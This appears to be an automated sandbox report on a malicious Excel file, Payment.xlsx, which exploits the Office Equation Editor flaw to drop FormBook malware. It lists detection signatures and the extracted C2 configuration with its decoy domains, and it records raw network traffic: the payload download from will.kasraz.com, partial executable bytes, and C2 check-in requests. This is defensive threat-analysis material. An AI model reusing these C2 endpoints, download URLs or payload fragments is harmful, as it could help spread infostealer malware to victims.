Analysis Report Payment.xlsx

Overview

General Information

Sample Name: Payment.xlsx
Analysis ID: 404048
MD5: 05f49aa5b342dedd1d7b6673f3d8bc41
SHA1: 9ca061b9851269f8b1d2fd990ebe119903a5f0fb
SHA256: 3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe ReversingLabs: Detection: 12%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 12%
Multi AV Scanner detection for submitted file
Source: Payment.xlsx Virustotal: Detection: 18% Perma Link
Source: Payment.xlsx ReversingLabs: Detection: 10%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A860
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A851
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047346A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473478
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047331A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047352A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473328
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473538
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731E8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735E8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735F8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 7_2_0040C368
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop esi 7_2_004157FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop edi 9_2_0008C368
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_000957FE
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: will.kasraz.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 192.3.122.177:80 -> 192.168.2.22:49167
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.cats16.com/8u3b/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 14:58:50 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Tue, 04 May 2021 10:00:54 GMTETag: "a2800-5c17e27600d6b"Accept-Ranges: bytesContent-Length: 665600Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 1b 91 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0a 00 00 08 00 00 00 00 00 00 26 3d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 3c 0a 00 4f 00 00 00 00 40 0a 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 1d 0a 00 00 20 00 00 00 1e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 04 00 00 00 40 0a 00 00 06 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 3d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 6e 01 00 b8 6d 01 00 03 00 00 00 01 00 00 06 e4 db 02 00 f0 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 17 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 93 03 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.210 198.54.117.210
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: will.kasraz.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 15:00:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=LaxCF-Cache-Status: MISScf-request-id: 09d97e072e00004e44b212b000000001Server: cloudflareCF-RAY: 64a2991eb90d4e44-FRAData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
